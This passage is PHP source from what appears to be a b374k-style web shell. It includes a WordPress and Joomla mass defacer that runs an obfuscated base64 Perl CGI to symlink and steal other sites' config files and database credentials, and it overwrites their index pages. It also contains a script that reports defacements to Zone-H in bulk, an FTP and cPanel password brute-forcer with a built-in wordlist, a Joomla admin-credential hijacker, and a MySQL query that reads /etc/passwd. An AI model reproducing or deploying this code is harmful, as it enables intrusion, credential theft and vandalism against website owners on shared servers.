color=&quot;pink&quot;&gt;JOOMLA&lt;/font&gt;&lt;/td&gt;';$res = index_changer_joomla($config01,
$def, $domain);echo '&lt;td&gt;'.$res['output'].'&lt;/td&gt;';if($res['cond']) {echo
'&lt;td align=&quot;center&quot;&gt;&lt;span
class=&quot;green&quot;&gt;DEFACED&lt;/span&gt;&lt;/td&gt;';fwrite($output,
'http://'.$domain.&quot;&lt;br&gt;&quot;);$count1++;} else {echo '&lt;td
align=&quot;center&quot;&gt;&lt;span class=&quot;red&quot;&gt;FAILED&lt;/span&gt;&lt;/td&gt;';}echo
'&lt;/tr&gt;';}if($config02 &amp;&amp; preg_match('/DB_NAME/i',$config02)){echo '&lt;tr
'.$cls.'&gt;&lt;td align=&quot;center&quot;&gt;'.($j++).'&lt;/td&gt;&lt;td&gt;&lt;a
href=&quot;http://'.$domain.'&quot; target=&quot;blank&quot;&gt;'.$domain.'&lt;/a&gt;&lt;/td&gt;';echo '&lt;td
align=&quot;center&quot;&gt;&lt;font color=&quot;yellow&quot;&gt;WORDPRESS&lt;/font&gt;&lt;/td&gt;';$res =
index_changer_wp($config02, $def);echo
'&lt;td&gt;'.$res['output'].'&lt;/td&gt;';if($res['cond']) {echo '&lt;td
align=&quot;center&quot;&gt;&lt;span class=&quot;green&quot;&gt;DEFACED&lt;/span&gt;&lt;/td&gt;';fwrite($output,
'http://'.$domain.&quot;&lt;br&gt;&quot;);$count2++;} else {echo '&lt;td
align=&quot;center&quot;&gt;&lt;span class=&quot;red&quot;&gt;FAILED&lt;/span&gt;&lt;/td&gt;';}echo '&lt;/tr&gt;';}}echo
'&lt;/table&gt;';echo '&lt;hr/&gt;';echo 'Total Defaced = '.($count1+$count2).'
(JOOMLA = '.$count1.', WORDPRESS = '.$count2.')&lt;br /&gt;';echo '&lt;a
href=&quot;defaced.html&quot; target=&quot;_blank&quot;&gt;View Total Defaced urls&lt;/a&gt;&lt;br
/&gt;';if($count1+$count2 &gt; 0){echo '&lt;a
href=&quot;'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&amp;zh=1&quot;
target=&quot;_blank&quot; id=&quot;zhso&quot;&gt;Send to Zone-H&lt;/a&gt;';}}function
exec_mode_3($def_url) {$domains =
@file_get_contents(&quot;/etc/named.conf&quot;);@preg_match_all('/.*?zone &quot;(.*?)&quot;
{/', $domains, $out);$out = array_unique($out[1]);$num =
count($out);print(&quot;Total domains: $num&lt;br&gt;&lt;br /&gt;&quot;);$def =
file_get_contents($def_url);$def = urlencode($def); $output =
fopen('defaced.html', 'a+');$defaced = '';$count1 = 0;$count2 = 0;echo
'&lt;table style=&quot;width:75%;&quot;&gt;&lt;tr style=&quot;background:rgba(160, 82,
45,0.6);&quot;&gt;&lt;th&gt;ID&lt;/th&gt;&lt;th&gt;SID&lt;/th&gt;&lt;th&gt;Domain&lt;/th&gt;&lt;th&gt;Type&lt;/th&gt;&lt;th&gt;Action&lt;/
th&gt;&lt;th&gt;Status&lt;/th&gt;&lt;/tr&gt;';$j = 1;$map = array();foreach($out as $d) {$info
= @posix_getpwuid(fileowner(&quot;/etc/valiases/&quot;.$d));$map[$info['name']] =
$d;}$dt =
'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgk
dXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHd
kfTsNCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAg
ICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcH
VibGljX2h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQo
gICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL
3B1YmxpY19odG1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCi
AgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicv
cHVibGljX2h0bWwvYmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4d
CcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRkl
MRSwgJ2RhdGEudHh0Jyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5
ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPC
R5OyRrYSsrKXsNCiAgICB3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiA
gICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';mkdir('plsym',0777);file_put_conte
nts('plsym/data.txt',
$_POST['man_data']);file_put_contents('plsym/plsym.cc',
base64_decode($dt));chmod('plsym/plsym.cc', 0755);$wr = &quot;Options
FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpdcgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc&quot;;$fp =
@fopen ('plsym/.htaccess','w');fwrite($fp, $wr);fclose($fp);$res =
file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCR
IPT_NAME']).'/plsym/plsym.cc'); $url =
'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsy
m/';unlink('plsym/plsym.cc');$data =
file_get_contents($url);preg_match_all('/&lt;a href=&quot;(.+)&quot;&gt;/', $data,
$match);unset($match[1][0]);$i=1;foreach($match[1] as $m){$mz =
explode('##',urldecode($m));$config01 = '';$config02 = '';if($mz[1] ==
'joomla.txt') {$config01 = file_get_contents($url.$m);}if($mz[1] ==
'wordpress.txt') {$config02 = file_get_contents($url.$m);}$domain =
$map[$mz[0]];$cls = ($j % 2 == 0) ? 'class=&quot;even&quot;' :
'class=&quot;odd&quot;';if($config01 &amp;&amp; preg_match('/dbprefix/i',$config01)){echo
'&lt;tr '.$cls.'&gt;&lt;td align=&quot;center&quot;&gt;'.($j++).'&lt;/td&gt;&lt;td
align=&quot;center&quot;&gt;'.($i++).'&lt;/td&gt;&lt;td&gt;&lt;a href=&quot;http://'.$domain.'&quot;
target=&quot;blank&quot;&gt;'.$domain.'&lt;/a&gt;&lt;/td&gt;';echo '&lt;td align=&quot;center&quot;&gt;&lt;font
color=&quot;pink&quot;&gt;JOOMLA&lt;/font&gt;&lt;/td&gt;';$res = index_changer_joomla($config01,
$def, $domain);echo '&lt;td&gt;'.$res['output'].'&lt;/td&gt;';if($res['cond']) {echo
'&lt;td align=&quot;center&quot;&gt;&lt;span
class=&quot;green&quot;&gt;DEFACED&lt;/span&gt;&lt;/td&gt;';fwrite($output,
'http://'.$domain.&quot;&lt;br&gt;&quot;);$count1++;} else {echo '&lt;td
align=&quot;center&quot;&gt;&lt;span class=&quot;red&quot;&gt;FAILED&lt;/span&gt;&lt;/td&gt;';}echo
'&lt;/tr&gt;';}if($config02 &amp;&amp; preg_match('/DB_NAME/i',$config02)){echo '&lt;tr
'.$cls.'&gt;&lt;td align=&quot;center&quot;&gt;'.($j++).'&lt;/td&gt;&lt;td&gt;&lt;a
href=&quot;http://'.$domain.'&quot; target=&quot;blank&quot;&gt;'.$domain.'&lt;/a&gt;&lt;/td&gt;';echo '&lt;td
align=&quot;center&quot;&gt;&lt;font color=&quot;yellow&quot;&gt;WORDPRESS&lt;/font&gt;&lt;/td&gt;';$res =
index_changer_wp($config02, $def);echo
'&lt;td&gt;'.$res['output'].'&lt;/td&gt;';if($res['cond']) {echo '&lt;td
align=&quot;center&quot;&gt;&lt;span class=&quot;green&quot;&gt;DEFACED&lt;/span&gt;&lt;/td&gt;';fwrite($output,
'http://'.$domain.&quot;&lt;br&gt;&quot;);$count2++;} else {echo '&lt;td
align=&quot;center&quot;&gt;&lt;span class=&quot;red&quot;&gt;FAILED&lt;/span&gt;&lt;/td&gt;';}echo '&lt;/tr&gt;';}}echo
'&lt;/table&gt;';echo '&lt;hr/&gt;';echo 'Total Defaced = '.($count1+$count2).'
(JOOMLA = '.$count1.', WORDPRESS = '.$count2.')&lt;br /&gt;';echo '&lt;a
href=&quot;defaced.html&quot; target=&quot;_blank&quot;&gt;View Total Defaced urls&lt;/a&gt;&lt;br
/&gt;';if($count1+$count2 &gt; 0){echo '&lt;a
href=&quot;'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&amp;zh=1&quot;
target=&quot;_blank&quot; id=&quot;zhso&quot;&gt;Send to Zone-H&lt;/a&gt;';}}echo '&lt;!DOCTYPE
html&gt;&lt;html&gt;&lt;head&gt;&lt;link
href=&quot;http://fonts.googleapis.com/css?family=Orbitron:700&quot;
rel=&quot;stylesheet&quot; type=&quot;text/css&quot;&gt;&lt;style type=&quot;text/css&quot;&gt;.header
{position:fixed;width:100%;top:0;background:#000;}.footer
{position:fixed;width:100%;bottom:0;background:#000;}input[type=&quot;radio&quot;]{
margin-top: 0;}.td2 {border-left:1px solid red;border-radius: 2px 2px 2px
2px;}.even {background-color: rgba(25, 25, 25, 0.6);}.odd {backgroundcolor: rgba(102, 102, 102, 0.6);}textarea{background: rgba(0,0,0,0.6);
color: white;}.green {color:#00FF00;font-weight:bold;}.red
{color:#FF0000;font-weight:bold;}&lt;/style&gt;&lt;script
type=&quot;text/javascript&quot;&gt;function change()
{if(document.getElementById(\'rcd\').checked == true)
{document.getElementById(\'tra\').style.display = \'\';} else
{document.getElementById(\'tra\').style.display = \'none\';}}function
hide() {document.getElementById(\'tra\').style.display =
\'none\';}&lt;/script&gt;&lt;/head&gt;&lt;body&gt;&lt;h2 style=&quot;fontsize:25px;color:#00ff00;text-align: center;font-family:orbitron;textshadow: 6px 6px 6px black;&quot;&gt;Wordpress and Joomla Mass
Defacer&lt;/h2&gt;';if(!isset($_POST['form_action']) &amp;&amp;
!isset($_GET['mode'])){echo '&lt;center&gt;&lt;div class=&quot;mybox&quot;
align=&quot;center&quot;&gt;&lt;form action=&quot;&quot; method=&quot;post&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td&gt;&lt;input
type=&quot;radio&quot; value=&quot;1&quot; name=&quot;mode&quot; checked=&quot;checked&quot;
onclick=&quot;hide();&quot;&gt;&lt;/td&gt;&lt;td&gt;using /etc/named.conf
('.(is_readable('/etc/named.conf')?'&lt;span
class=&quot;green&quot;&gt;READABLE&lt;/span&gt;':'&lt;span class=&quot;red&quot;&gt;NOT
READABLE&lt;/span&gt;').')&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;input type=&quot;radio&quot; value=&quot;2&quot;
name=&quot;mode&quot; onclick=&quot;hide();&quot;&gt;&lt;/td&gt;&lt;td&gt;using /etc/passwd
('.(is_readable('/etc/passwd')?'&lt;span
class=&quot;green&quot;&gt;READABLE&lt;/span&gt;':'&lt;span class=&quot;red&quot;&gt;NOT
READABLE&lt;/span&gt;').')&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;input type=&quot;radio&quot; value=&quot;2&quot;
name=&quot;mode&quot; id=&quot;rcd&quot; onclick=&quot;change();&quot;&gt;&lt;/td&gt;&lt;td&gt;manual copy of
/etc/passwd&lt;/td&gt;&lt;/tr&gt;&lt;tr id=&quot;tra&quot; style=&quot;display:
none;&quot;&gt;&lt;td&gt;&lt;/td&gt;&lt;td&gt;&lt;textarea cols=&quot;60&quot; rows=&quot;10&quot;
name=&quot;man_data&quot;&gt;&lt;/textarea&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br&gt;&lt;input type=&quot;hidden&quot;
name=&quot;form_action&quot; value=&quot;1&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td&gt;&lt;b&gt;index url: &lt;/b&gt;&lt;input
class=&quot;inputz&quot; size=&quot;45&quot; type=&quot;text&quot; name=&quot;defpage&quot;
value=&quot;&quot;&gt;&lt;/tr&gt;&lt;/td&gt;&lt;/table&gt;&lt;input class=&quot;inputzbut&quot; type=&quot;submit&quot;
value=&quot;Attack !&quot; name=&quot;Submit&quot;&gt;&lt;/form&gt;&lt;/div&gt;&lt;/center&gt;';}$milaf_el_index =
$_POST['defpage'];if($_POST['form_action'] == 1) {if($_POST['mode']==1) {
exec_mode_1($milaf_el_index); }if($_POST['mode']==2) {
exec_mode_2($milaf_el_index); }if($_POST['mode']==3) {
exec_mode_3($milaf_el_index); }}if($_GET['mode']==1) {
exec_mode_1($milaf_el_index); }echo '&lt;/body&gt;&lt;/html&gt;';}
elseif(isset($_GET['x']) &amp;&amp; ($_GET['x'] == 'zoneh')){$defacer='ReZK2LL';$display_details=0;$method=14;$reason=5;error_rep
orting(0);set_time_limit(0);if(!function_exists('curl_init')){echo &quot;CURL
ERROR\n&quot;;exit;}$cli=(isset($argv[0]))?1:0;if($cli==1){$file=$argv[1];$sit
es=file($file);}if(function_exists(apache_setenv)){@apache_setenv('nogzip', 1);}@ini_set('zlib.output_compression',
0);@ini_set('implicit_flush',
1);@ob_implicit_flush(true);@ob_end_flush();if(isset($_POST['domains'])){
$sites=explode(&quot;\n&quot;,$_POST['domains']);}if
(file_exists($_FILES[&quot;file&quot;][&quot;tmp_name&quot;])){$file=$_FILES[&quot;file&quot;][&quot;tmp_nam
e&quot;];$sites=file($file);}
echo &lt;&lt;&lt;EOF
&lt;div align=&quot;center&quot;&gt;&lt;table width=&quot;67%&quot;&gt;&lt;tr&gt;&lt;td
align=center&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br&gt;&lt;pre&gt;
EOF;
if(!isset($_POST['defacer'])){
echo &lt;&lt;&lt;EOF
&lt;div class=&quot;mybox&quot;&gt;&lt;h2 class=&quot;B0K4_B4B42&quot;&gt;Zone-H Poster&lt;/h2&gt;&lt;form
enctype=&quot;multipart/form-data&quot; method=&quot;POST&quot;&gt;&lt;div align='center'&gt;&lt;span
lang='en-us'&gt;&lt;b&gt;Defacer&amp;nbsp;:&lt;/b&gt;&lt;/span&gt;&lt;input class='inputz'
name=&quot;defacer&quot; type=&quot;text&quot; value=&quot;$defacer&quot; /&gt;&lt;br/&gt;&lt;table
width='55%'&gt;&lt;tr&gt;&lt;td align='center'&gt;&lt;span lang='enus'&gt;&lt;b&gt;Domains:&lt;/b&gt;&lt;/span&gt;&lt;p align='center'&gt;&amp;nbsp;&lt;textarea rows='30'
name='domains' placeholder=' put domains here' cols='50'
class='inputz'&gt;&lt;/textarea&gt;&lt;br/&gt;&lt;span lang='enus'&gt;&lt;b&gt;OR&lt;/b&gt;&lt;/span&gt;&lt;br/&gt;Submit form .txt file:&lt;br/&gt;&lt;input name=&quot;file&quot;
type=&quot;file&quot; /&gt;&lt;br&gt;&lt;br/&gt;&lt;br/&gt;&lt;input class='inputzbut' type='submit'
value='Send' name='submit'&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/form&gt;&lt;/div&gt;
EOF;
}$defacer=$_POST['defacer'];if(!$sites){echo
'&lt;/pre&gt;';exit;}$sites=array_unique(str_replace('http://','',$sites));$tot
al=count($sites);echo &quot;[+] Total unique domain:
$total\n\n&quot;;$pause=10;$start=time();$main=curl_multi_init();for($m=0;$m&lt;3
;$m++){$http[] = curl_init();}for($n=0;$n&lt;$total;$n
+=30){if($display_details==1){for($x=0;$x&lt;30;$x++){echo'[+] Adding
'.rtrim($sites[$n+$x]).'';echo
&quot;\n&quot;;}}$d=$n+30;if($d&gt;$total){$d=$total;}echo
&quot;=====================&gt;[$d/$total]\n&quot;;for($w=0;$w&lt;3;$w++){$p=$w *
10;if(!(isset($sites[$n+$p]))){$pause=$w;break;}$posts[$w]=&quot;defacer=$defa
cer&amp;domain1=http%3A%2F%2F&quot;.rtrim($sites[$n+$p]).&quot;&amp;domain2=http%3A%2F%2F&quot;.
rtrim($sites[$n+$p+1]).&quot;&amp;domain3=http%3A%2F%2F&quot;.rtrim($sites[$n+$p+2]).&quot;&amp;
domain4=http%3A%2F%2F&quot;.rtrim($sites[$n+$p+3]).&quot;&amp;domain5=http%3A%2F%2F&quot;.rt
rim($sites[$n+$p+4]).&quot;&amp;domain6=http%3A%2F%2F&quot;.rtrim($sites[$n+$p+5]).&quot;&amp;do
main7=http%3A%2F%2F&quot;.rtrim($sites[$n+$p+6]).&quot;&amp;domain8=http%3A%2F%2F&quot;.rtri
m($sites[$n+$p+7]).&quot;&amp;domain9=http%3A%2F%2F&quot;.rtrim($sites[$n+$p+8]).&quot;&amp;doma
in10=http%3A%2F%2F&quot;.rtrim($sites[$n+$p+9]).&quot;&amp;hackmode=&quot;.$method.&quot;&amp;reason=
&quot;.$reason.&quot;&amp;submit=Send&quot;;$curlopt=array(CURLOPT_USERAGENT =&gt; 'Mozilla/5.0
(Windows NT 6.1;WOW64) AppleWebKit/535.16 (KHTML, like Gecko)
Chrome/18.0.1003.1 Safari/535.16',CURLOPT_RETURNTRANSFER =&gt;
true,CURLOPT_FOLLOWLOCATION =&gt;true,CURLOPT_ENCODING =&gt;
true,CURLOPT_HEADER =&gt; false,CURLOPT_HTTPHEADER =&gt; array(&quot;Keep-Alive:
7&quot;),CURLOPT_CONNECTTIMEOUT =&gt; 3,CURLOPT_URL =&gt; 'http://www.zoneh.com/notify/mass',CURLOPT_POSTFIELDS =&gt;
$posts[$w]);curl_setopt_array($http[$w],$curlopt);curl_multi_add_handle($
main,$http[$w]);}$running =
null;do{curl_multi_exec($main,$running);}while($running &gt;
0);for($m=0;$m&lt;3;$m++){if($pause==$m){break;}curl_multi_remove_handle($ma
in, $http[$m]);$code = curl_getinfo($http[$m], CURLINFO_HTTP_CODE);if
($code != 200) {while(true){echo' [-]Error!....Retrying';echo
&quot;\n&quot;;sleep(5);curl_exec($http[$m]);$code = curl_getinfo($http[$m],
CURLINFO_HTTP_CODE);if( $code== 200){break 1;}}}}}$end= time() $start;echo 'Done';echo &quot;\n\n[*]Time: $end
seconds\n&quot;;curl_multi_close($main);if($cli==0){echo
'&lt;/pre&gt;&lt;/body&gt;&lt;/html&gt;';}exit;}
elseif(isset($_GET['x']) &amp;&amp; ($_GET['x'] == 'brute')){$connect_timeout=5;
set_time_limit(0);$submit=$_REQUEST['submit'];$users=$_REQUEST['users'];$
pass=$_REQUEST['passwords'];$target=$_REQUEST['target'];$cracktype=$_REQU
EST['cracktype'];if($target == &quot;&quot;){$target = &quot;localhost&quot;;}?&gt;&lt;div
align=&quot;center&quot;&gt;&lt;form method=&quot;POST&quot; style=&quot;border: 1px solid
#000000&quot;&gt;&lt;br&gt;&lt;?php function ftp_check($host,$user,$pass,$timeout){$ch =
curl_init();curl_setopt($ch, CURLOPT_URL, &quot;ftp://$host&quot;);curl_setopt($ch,
CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HTTPAUTH,
CURLAUTH_BASIC);curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);curl_setopt($ch,
CURLOPT_USERPWD, &quot;$user:$pass&quot;);curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT,
$timeout);curl_setopt($ch, CURLOPT_FAILONERROR, 1);$data =
curl_exec($ch);if ( curl_errno($ch) == 28 ) {print &quot;&lt;b&gt;Connection Timed
out&lt;/b&gt;&quot;;exit;}elseif ( curl_errno($ch) == 0 ){print &quot;&lt;table
width='67%'&gt;&lt;tr&gt;&lt;td align=center&gt;&lt;b&gt;Username ($user) | Password
($pass)&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&quot;;}curl_close($ch);}function
cpanel_check($host,$user,$pass,$timeout){$ch =
curl_init();curl_setopt($ch, CURLOPT_URL,
&quot;http://$host:2082&quot;);curl_setopt($ch, CURLOPT_RETURNTRANSFER,
1);curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);curl_setopt($ch,
CURLOPT_USERPWD, &quot;$user:$pass&quot;);curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT,
$timeout);curl_setopt($ch, CURLOPT_FAILONERROR, 1);$data =
curl_exec($ch);if ( curl_errno($ch) == 28 ) {print &quot;&lt;b&gt;Connection Timed
out&lt;/b&gt;&quot;;exit;}elseif ( curl_errno($ch) == 0 ){print &quot;&lt;table
width='67%'&gt;&lt;tr&gt;&lt;td align=center&gt;&lt;b&gt;[+]Username ($user) | Password
($pass)&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&quot;;}curl_close($ch);}if(isset($submit) &amp;&amp;
!empty($submit)){if(empty($users) &amp;&amp; empty($pass)){print &quot;&lt;p&gt;&lt;b&gt;Error :
Check The Users and Password List&lt;/b&gt;&lt;/p&gt;&quot;;exit;}if(empty($users)){print
&quot;&lt;p&gt;&lt;b&gt;Error :Check The Users List&lt;/b&gt;&lt;/p&gt;&quot;;exit;}if(empty($pass) ){print
&quot;&lt;p&gt;&lt;b&gt;Error :Check The Password
List&lt;/b&gt;&lt;/p&gt;&quot;;exit;};$userlist=explode(&quot;\n&quot;,$users);$passlist=explode(&quot;\n
&quot;,$pass);print &quot;&lt;b&gt;[~] Wait ...&lt;/b&gt;&lt;br&gt;&lt;br&gt;&quot;;foreach ($userlist as $user)
{$pureuser = trim($user);foreach ($passlist as $password ) {$purepass =
trim($password);if($cracktype ==
&quot;ftp&quot;){ftp_check($target,$pureuser,$purepass,$connect_timeout);}if
($cracktype ==
&quot;cpanel&quot;){cpanel_check($target,$pureuser,$purepass,$connect_timeout);}}}}
echo &quot;&lt;cecnter&gt;&lt;div class='mybox'&gt;&lt;h2 class='B0K4_B4B42'&gt;The
Cracker&lt;/h2&gt;&lt;form method=POST action=''&gt;&lt;table width='67%'&gt;&lt;tr&gt;&lt;td&gt;&lt;br&gt;&lt;p
align='center'&gt;&lt;b&gt;&lt;span lang='en-us'&gt;IP&lt;/span&gt; :&lt;input class='inputz'
type='text' name='target' size='16' value=$target&gt;&lt;/b&gt;&lt;/p&gt;&lt;div
align='center'&gt;&lt;p align='center'&gt;users&lt;textarea class='inputz' cols=20
rows=20 name='users'&gt;&quot;;
system('ls /var/mail');
echo &quot;&lt;/textarea&gt;passwords&lt;textarea class='inputz' cols=20 rows=20
name='passwords'&gt;123123\n123456\n1234567\n12345678\n123456789\n159159\n11
2233\nadmin\n332211\n14789632\npasswd\n159357\n357951\n114477\npass\nPass
word&lt;/textarea&gt;&lt;br&gt;&lt;br&gt;&lt;input name='cracktype' value='cpanel' checked
type='radio'&gt;&lt;/span&gt;&lt;b&gt;Cpanel(2082)&lt;/b&gt;&lt;input name='cracktype'
value='ftp' style='font-weight: 700;' type='radio'&gt;&lt;/font&gt;&lt;/font&gt;&lt;font
style='font-weight: 700;' size='2' face='Tahoma'&gt;&lt;span style='fontweight: 700;'&gt;Ftp (21)&lt;/span&gt;&lt;/p&gt;&lt;br&gt;&lt;center&gt;&lt;input class='inputzbut'
type='submit' value='Start Cracking'
name='submit'&gt;&lt;/center&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/form&gt;&lt;/div&gt;&lt;/center&gt;
&quot;;die();}
elseif(isset($_GET['x']) &amp;&amp; ($_GET['x'] ==
'joomla')){if(empty($_POST['pwd'])){echo &quot;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;center&gt;&lt;div
class='mybox'&gt;&lt;h2 class='B0K4_B4B42'&gt;Joomla login changer&lt;/h2&gt;&lt;FORM
method='POST'&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;DB_Prefix :&amp;nbsp;&amp;nbsp;&lt;INPUT class ='inputz'
size='8' value='jos_' name='prefix' type='text'&gt;&amp;nbsp;host
:&amp;nbsp;&amp;nbsp;&lt;INPUT class ='inputz' size='10' value='localhost'
name='localhost' type='text'&gt;&amp;nbsp;database :&amp;nbsp;&amp;nbsp;&lt;INPUT class
='inputz' size='10' value='database' name='database'
type='text'&gt;&amp;nbsp;username :&amp;nbsp;&amp;nbsp;&lt;INPUT class ='inputz' size='10'
value='db_user' name='username' type='text'&gt;&amp;nbsp;password
:&amp;nbsp;&amp;nbsp;&lt;INPUT class ='inputz' size='10' value='db_pass'
name='password' type='text'&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&lt;br&gt;New
Username:&amp;nbsp;&amp;nbsp;&lt;INPUT class ='inputz' name='admin' size='15'
value='k2'&gt;&lt;br&gt;&lt;br&gt;New Password:&amp;nbsp;&amp;nbsp;&lt;INPUT class ='inputz'
name='pwd' size='15' value='123123'&gt;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&lt;INPUT
value='change' class='inputzbut' name='send'
type='submit'&gt;&lt;/FORM&gt;&lt;/div&gt;&lt;/center&gt;&quot;;}else {$prefix =
$_POST['prefix'];$localhost = $_POST['localhost'];$database =
$_POST['database'];$username = $_POST['username'];$password =
$_POST['password'];$admin = $_POST['admin'];$pd = ($_POST[&quot;pwd&quot;]);$pwd =
md5($pd);@mysql_connect($localhost,$username,$password) or die
(mysql_error());@mysql_select_db($database) or die
(mysql_error());$SQL=@mysql_query(&quot;UPDATE &quot;.$prefix.&quot;users SET username
='&quot;.$admin.&quot;' WHERE name = 'Super User' or name = 'Super Utilisateur' or
id='62'&quot;) or die (mysql_error());$SQL=@mysql_query(&quot;UPDATE
&quot;.$prefix.&quot;users SET password ='&quot;.$pwd.&quot;' WHERE name = 'Super User' or
name = 'Super Utilisateur' or id='62'&quot;) or die (mysql_error());if($SQL)
echo &quot;&lt;br&gt;&lt;br&gt;&lt;center&gt;&lt;h1&gt;Done... go and login&lt;/h1&gt;&lt;/center&gt;&quot;;}}
elseif(isset($_GET['x']) &amp;&amp; ($_GET['x'] ==
'mysql')){if(isset($_GET['sqlhost']) &amp;&amp; isset($_GET['sqluser']) &amp;&amp;
isset($_GET['sqlpass']) &amp;&amp; isset($_GET['sqlport'])){$sqlhost =
$_GET['sqlhost'];$sqluser = $_GET['sqluser'];$sqlpass =
$_GET['sqlpass'];$sqlport = $_GET['sqlport'];if($con =
@mysql_connect($sqlhost.&quot;:&quot;.$sqlport,$sqluser,$sqlpass)){$msg .= &quot;&lt;div
style='width:99%;padding:4px 10px 0 10px;'&gt;&quot;;$msg .= &quot;&lt;p&gt;Connected to
&quot;.$sqluser.&quot;&lt;span class='gaya'&gt;@&lt;/span&gt;&quot;.$sqlhost.&quot;:&quot;.$sqlport;$msg .=
&quot;&amp;nbsp;&amp;nbsp;&lt;span class='gaya'&gt;-&amp;gt;&lt;/span&gt;&amp;nbsp;&amp;nbsp;&lt;a
href='?y=&quot;.$pwd.&quot;&amp;amp;x=mysql&amp;amp;sqlhost=&quot;.$sqlhost.&quot;&amp;amp;sqluser=&quot;.$sql
user.&quot;&amp;amp;sqlpass=&quot;.$sqlpass.&quot;&amp;amp;sqlport=&quot;.$sqlport.&quot;&amp;amp;'&gt;[
databases ]&lt;/a&gt;&quot;;if(isset($_GET['db'])) $msg .= &quot;&amp;nbsp;&amp;nbsp;&lt;span
class='gaya'&gt;-&amp;gt;&lt;/span&gt;&amp;nbsp;&amp;nbsp;&lt;a
href='?y=&quot;.$pwd.&quot;&amp;amp;x=mysql&amp;amp;sqlhost=&quot;.$sqlhost.&quot;&amp;amp;sqluser=&quot;.$sql
user.&quot;&amp;amp;sqlpass=&quot;.$sqlpass.&quot;&amp;amp;sqlport=&quot;.$sqlport.&quot;&amp;amp;db=&quot;.$_GET['
db'].&quot;'&gt;&quot;.htmlspecialchars($_GET['db']).&quot;&lt;/a&gt;&quot;;if(isset($_GET['table']))
$msg .= &quot;&amp;nbsp;&amp;nbsp;&lt;span class='gaya'&gt;-&amp;gt;&lt;/span&gt;&amp;nbsp;&amp;nbsp;&lt;a
href='?y=&quot;.$pwd.&quot;&amp;amp;x=mysql&amp;amp;sqlhost=&quot;.$sqlhost.&quot;&amp;amp;sqluser=&quot;.$sql
user.&quot;&amp;amp;sqlpass=&quot;.$sqlpass.&quot;&amp;amp;sqlport=&quot;.$sqlport.&quot;&amp;amp;db=&quot;.$_GET['
db'].&quot;&amp;amp;table=&quot;.$_GET['table'].&quot;'&gt;&quot;.htmlspecialchars($_GET['table']).&quot;
&lt;/a&gt;&quot;;$msg .= &quot;&lt;/p&gt;&lt;p&gt;version : &quot;.mysql_get_server_info($con).&quot; proto
&quot;.mysql_get_proto_info($con).&quot;&lt;/p&gt;&quot;;$msg .= &quot;&lt;/div&gt;&quot;;echo
$msg;if(isset($_GET['db']) &amp;&amp; (!isset($_GET['table'])) &amp;&amp;
(!isset($_GET['sqlquery']))){$db = $_GET['db'];$query = &quot;DROP TABLE IF
EXISTS b374k_table;\nCREATE TABLE `b374k_table` ( `file` LONGBLOB NOT
NULL );\nLOAD DATA INFILE '/etc/passwd'\nINTO TABLE b374k_table;SELECT *
FROM b374k_table;\nDROP TABLE IF EXISTS b374k_table;&quot;;$msg = &quot;&lt;div
style='width:99%;padding:0 10px;'&gt;&lt;form action='?' method='get'&gt;&lt;input
type='hidden' name='y' value='&quot;.$pwd.&quot;' /&gt; &lt;input type='hidden' name='x'
value='mysql' /&gt; &lt;input type='hidden' name='sqlhost' value='&quot;.$sqlhost.&quot;'
/&gt; &lt;input type='hidden' name='sqluser' value='&quot;.$sqluser.&quot;' /&gt; &lt;input
type='hidden' name='sqlport' value='&quot;.$sqlport.&quot;' /&gt; &lt;input type='hidden'
name='sqlpass' value='&quot;.$sqlpass.&quot;' /&gt; &lt;input type='hidden' name='db'
value='&quot;.$db.&quot;' /&gt; &lt;p&gt;&lt;textarea name='sqlquery' class='output'
style='width:98%;height:80px;'&gt;$query&lt;/textarea&gt;&lt;/p&gt; &lt;p&gt;&lt;input
class='inputzbut' style='width:80px;' name='submitquery' type='submit'
